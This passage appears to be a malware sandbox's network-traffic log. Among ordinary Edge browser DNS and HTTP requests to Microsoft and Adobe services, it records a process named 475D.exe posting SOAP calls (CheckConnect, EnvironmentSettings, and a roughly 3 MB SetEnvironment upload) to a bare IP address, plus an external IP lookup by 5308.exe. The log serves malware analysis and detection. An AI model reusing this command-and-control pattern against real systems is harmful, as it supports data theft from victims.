                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                IN CNAME
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.246.67
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.213.67
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                wcpstatic.microsoft.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                wcpstatic.microsoft.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                wcpstatic.microsoft.com
                                                                                                                IN CNAME
                                                                                                                consentdeliveryfd.azurefd.net
                                                                                                                consentdeliveryfd.azurefd.net
                                                                                                                IN CNAME
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                IN CNAME
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.246.67
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.213.67
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                js.monitor.azure.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                js.monitor.azure.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                js.monitor.azure.com
                                                                                                                IN CNAME
                                                                                                                aijscdn2.azureedge.net
                                                                                                                aijscdn2.azureedge.net
                                                                                                                IN CNAME
                                                                                                                aijscdn2.afd.azureedge.net
                                                                                                                aijscdn2.afd.azureedge.net
                                                                                                                IN CNAME
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                IN CNAME
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.246.67
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.213.67
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                js.monitor.azure.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                js.monitor.azure.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                js.monitor.azure.com
                                                                                                                IN CNAME
                                                                                                                aijscdn2.azureedge.net
                                                                                                                aijscdn2.azureedge.net
                                                                                                                IN CNAME
                                                                                                                aijscdn2.afd.azureedge.net
                                                                                                                aijscdn2.afd.azureedge.net
                                                                                                                IN CNAME
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                firstparty-azurefd-prod.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                dual.part-0039.t-0009.t-msedge.net
                                                                                                                IN CNAME
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.246.67
                                                                                                                part-0039.t-0009.t-msedge.net
                                                                                                                IN A
                                                                                                                13.107.213.67
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                13.107.246.67:443
                                                                                                                Request
                                                                                                                GET /mscc/lib/v2/wcp-consent.js HTTP/2.0
                                                                                                                host: wcpstatic.microsoft.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: script
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: max-age=43200
                                                                                                                content-length: 81726
                                                                                                                content-type: application/javascript
                                                                                                                content-encoding: gzip
                                                                                                                content-md5: X1JOIM5h9UISVFS6+GfEew==
                                                                                                                last-modified: Wed, 24 Aug 2022 17:34:36 GMT
                                                                                                                age: 40051
                                                                                                                etag: 0x8DA85F6EA62BF74
                                                                                                                vary: Accept-Encoding
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                x-cache: CONFIG_NOCACHE
                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                x-ms-lease-status: unlocked
                                                                                                                x-ms-request-id: a07fad4d-401e-0053-5bf0-fc2946000000
                                                                                                                x-ms-version: 2009-09-19
                                                                                                                x-azure-ref: 0oFsoZQAAAADbHTo/r0TOQI0WeQCqAhGYQlJVMzBFREdFMDQwNwAzOWI0NjE1Ny1jYjllLTQ5YjctYTY1YS04NzIyYTNmODI0ZTQ=
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                              • flag-nl
                                                                                                                POST
                                                                                                                http://85.209.176.171/
                                                                                                                475D.exe
                                                                                                                Remote address:
                                                                                                                85.209.176.171:80
                                                                                                                Request
                                                                                                                POST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                Host: 85.209.176.171
                                                                                                                Content-Length: 137
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Connection: Keep-Alive
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Content-Length: 212
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Thu, 12 Oct 2023 20:48:33 GMT
                                                                                                              • flag-nl
                                                                                                                POST
                                                                                                                http://85.209.176.171/
                                                                                                                475D.exe
                                                                                                                Remote address:
                                                                                                                85.209.176.171:80
                                                                                                                Request
                                                                                                                POST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                Host: 85.209.176.171
                                                                                                                Content-Length: 144
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Content-Length: 4744
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Thu, 12 Oct 2023 20:48:38 GMT
                                                                                                              • flag-nl
                                                                                                                POST
                                                                                                                http://85.209.176.171/
                                                                                                                475D.exe
                                                                                                                Remote address:
                                                                                                                85.209.176.171:80
                                                                                                                Request
                                                                                                                POST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                Host: 85.209.176.171
                                                                                                                Content-Length: 3151191
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Content-Length: 147
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Thu, 12 Oct 2023 20:49:27 GMT
                                                                                                              • flag-nl
                                                                                                                DNS
                                                                                                                475D.exe
                                                                                                                Remote address:
                                                                                                                85.209.176.171:80
                                                                                                                Response
                                                                                                                HTTP/1.1 100 Continue
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                13.107.246.67:443
                                                                                                                Request
                                                                                                                GET /scripts/c/ms.jsll-3.min.js HTTP/2.0
                                                                                                                host: js.monitor.azure.com
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                accept: */*
                                                                                                                sec-fetch-site: cross-site
                                                                                                                sec-fetch-mode: no-cors
                                                                                                                sec-fetch-dest: script
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, max-age=1800, immutable, no-transform
                                                                                                                content-type: text/javascript; charset=utf-8
                                                                                                                content-encoding: br
                                                                                                                content-md5: n2Z/y+eaLwpYgTFdIs5bNA==
                                                                                                                last-modified: Thu, 21 Sep 2023 19:29:40 GMT
                                                                                                                etag: 0x8DBBAD919F17481
                                                                                                                x-cache: TCP_HIT
                                                                                                                x-ms-request-id: b13d48c5-a01e-00ac-3849-fdaaf4000000
                                                                                                                x-ms-version: 2009-09-19
                                                                                                                x-ms-meta-jssdkver: 3.2.14
                                                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.14.min.js
                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                access-control-allow-origin: *
                                                                                                                x-azure-ref-originshield: 0olUoZQAAAACUN2Gvg1PNToxEwnoV6epcQU1TMDRFREdFMTkwOQBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY=
                                                                                                                x-azure-ref: 0oFsoZQAAAAA7TOA61eO8TLcEWcOjd67CQlJVMzBFREdFMDcwNgBmMWNhNzNkNC04ODgzLTRjYWYtYWJkYy1mZTJkNTY3YWZiOTY=
                                                                                                                date: Thu, 12 Oct 2023 20:48:32 GMT
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                mscom.demdex.net
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                mscom.demdex.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                mscom.demdex.net
                                                                                                                IN CNAME
                                                                                                                gslb-2.demdex.net
                                                                                                                gslb-2.demdex.net
                                                                                                                IN CNAME
                                                                                                                edge-irl1.demdex.net
                                                                                                                edge-irl1.demdex.net
                                                                                                                IN CNAME
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                52.210.204.82
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                63.34.77.44
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.253.158.202
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                52.31.123.248
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.255.45.168
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                99.81.14.86
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.255.92.83
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.247.108.36
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                mscom.demdex.net
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                mscom.demdex.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                mscom.demdex.net
                                                                                                                IN CNAME
                                                                                                                gslb-2.demdex.net
                                                                                                                gslb-2.demdex.net
                                                                                                                IN CNAME
                                                                                                                edge-irl1.demdex.net
                                                                                                                edge-irl1.demdex.net
                                                                                                                IN CNAME
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                52.210.204.82
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                63.34.77.44
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.253.158.202
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                52.31.123.248
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.255.45.168
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                99.81.14.86
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.255.92.83
                                                                                                                dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
                                                                                                                IN A
                                                                                                                34.247.108.36
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                microsoftmscompoc.tt.omtrdc.net
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                microsoftmscompoc.tt.omtrdc.net
                                                                                                                IN A
                                                                                                                Response
                                                                                                                microsoftmscompoc.tt.omtrdc.net
                                                                                                                IN CNAME
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.113
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.152
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.115
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.126
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.107
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.143
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                target.microsoft.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                target.microsoft.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                target.microsoft.com
                                                                                                                IN CNAME
                                                                                                                microsoftmscompoc.tt.omtrdc.net
                                                                                                                microsoftmscompoc.tt.omtrdc.net
                                                                                                                IN CNAME
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.152
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.115
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.126
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.107
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.143
                                                                                                                adobetarget.data.adobedc.net
                                                                                                                IN A
                                                                                                                66.235.152.113
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                67.246.107.13.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                67.246.107.13.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                67.246.107.13.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                67.246.107.13.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                171.176.209.85.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                171.176.209.85.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                171.176.209.85.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                171.176.209.85.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                238.70.216.185.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                238.70.216.185.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                82.204.210.52.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                82.204.210.52.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                82.204.210.52.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                ec2-52-210-204-82 eu-west-1compute amazonawscom
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                api.ip.sb
                                                                                                                475D.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                api.ip.sb
                                                                                                                IN A
                                                                                                                Response
                                                                                                                api.ip.sb
                                                                                                                IN CNAME
                                                                                                                api.ip.sb.cdn.cloudflare.net
                                                                                                                api.ip.sb.cdn.cloudflare.net
                                                                                                                IN A
                                                                                                                104.26.12.31
                                                                                                                api.ip.sb.cdn.cloudflare.net
                                                                                                                IN A
                                                                                                                104.26.13.31
                                                                                                                api.ip.sb.cdn.cloudflare.net
                                                                                                                IN A
                                                                                                                172.67.75.172
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://api.ip.sb/ip
                                                                                                                5308.exe
                                                                                                                Remote address:
                                                                                                                104.26.12.31:443
                                                                                                                Request
                                                                                                                GET /ip HTTP/1.1
                                                                                                                Host: api.ip.sb
                                                                                                                Connection: Keep-Alive
                                                                                                                Response
                                                                                                                HTTP/1.1 200 OK
                                                                                                                Date: Thu, 12 Oct 2023 20:48:35 GMT
                                                                                                                Content-Type: text/plain
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: keep-alive
                                                                                                                vary: Accept-Encoding
                                                                                                                Cache-Control: no-cache
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8NCqvPhlcZw12kxt34OQh8DqzJeSyXChNksjvDDpOKZHJqMtUuqAEL8fSOPNLFw5qecnYi9TjKhgLDRGLDuMXeN%2FLakJMWVp8npplSwZOmwDsbbUCIktBsrsVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8152345d391f65f0-AMS
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                31.12.26.104.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                31.12.26.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                31.12.26.104.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                31.12.26.104.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                browser.events.data.microsoft.com
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                browser.events.data.microsoft.com
                                                                                                                IN A
                                                                                                                Response
                                                                                                                browser.events.data.microsoft.com
                                                                                                                IN CNAME
                                                                                                                browser.events.data.trafficmanager.net
                                                                                                                browser.events.data.trafficmanager.net
                                                                                                                IN CNAME
                                                                                                                onedscolprdcus11.centralus.cloudapp.azure.com
                                                                                                                onedscolprdcus11.centralus.cloudapp.azure.com
                                                                                                                IN A
                                                                                                                104.208.16.89
                                                                                                              • flag-us
                                                                                                                OPTIONS
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                OPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                accept: */*
                                                                                                                access-control-request-method: POST
                                                                                                                access-control-request-headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, 3600
                                                                                                                content-length: 0
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
                                                                                                                access-control-max-age: 3600
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                date: Thu, 12 Oct 2023 20:48:36 GMT
                                                                                                              • flag-us
                                                                                                                OPTIONS
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                OPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                accept: */*
                                                                                                                access-control-request-method: POST
                                                                                                                access-control-request-headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                cache-control: public, 3600
                                                                                                                content-length: 0
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
                                                                                                                access-control-max-age: 3600
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                date: Thu, 12 Oct 2023 20:48:40 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 3731
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143714624
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: use-collector-delta
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 153
                                                                                                                content-type: application/json
                                                                                                                server: Microsoft-HTTPAPI/2.0
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                set-cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178; Domain=.microsoft.com; Expires=Fri, 11 Oct 2024 20:48:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                set-cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6; Domain=.microsoft.com; Expires=Thu, 12 Oct 2023 21:18:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                time-delta-millis: 2554
                                                                                                                access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                access-control-allow-methods: POST
                                                                                                                access-control-allow-credentials: true
                                                                                                                access-control-allow-origin: https://learn.microsoft.com
                                                                                                                access-control-expose-headers: time-delta-millis
                                                                                                                date: Thu, 12 Oct 2023 20:48:36 GMT
                                                                                                              • flag-us
                                                                                                                POST
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0
                                                                                                                msedge.exe
                                                                                                                Remote address:
                                                                                                                104.208.16.89:443
                                                                                                                Request
                                                                                                                POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
                                                                                                                host: browser.events.data.microsoft.com
                                                                                                                content-length: 3899
                                                                                                                sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                                upload-time: 1697143715983
                                                                                                                dnt: 1
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                client-version: 1DS-Web-JS-3.2.14
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                                time-delta-to-apply-millis: 2554
                                                                                                                content-type: application/x-json-stream
                                                                                                                cache-control: no-cache, no-store
                                                                                                                apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
                                                                                                                client-id: NO_AUTH
                                                                                                                accept: */*
                                                                                                                origin: https://learn.microsoft.com
                                                                                                                sec-fetch-site: same-site
                                                                                                                sec-fetch-mode: cors
                                                                                                                sec-fetch-dest: empty
                                                                                                                referer: https://learn.microsoft.com/
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                accept-language: en-US,en;q=0.9
                                                                                                                cookie: MC1=GUID=ec0a3a472a5447f09b6cc4f266400c4c&HASH=ec0a&LV=202310&V=4&LU=1697143717178
                                                                                                                cookie: MS0=e65df4a6d8694e9e947d42ffde1a18a6
                                                                                                                Response
                                                                                                                HTTP/2.0 200
                                                                                                                content-length: 153
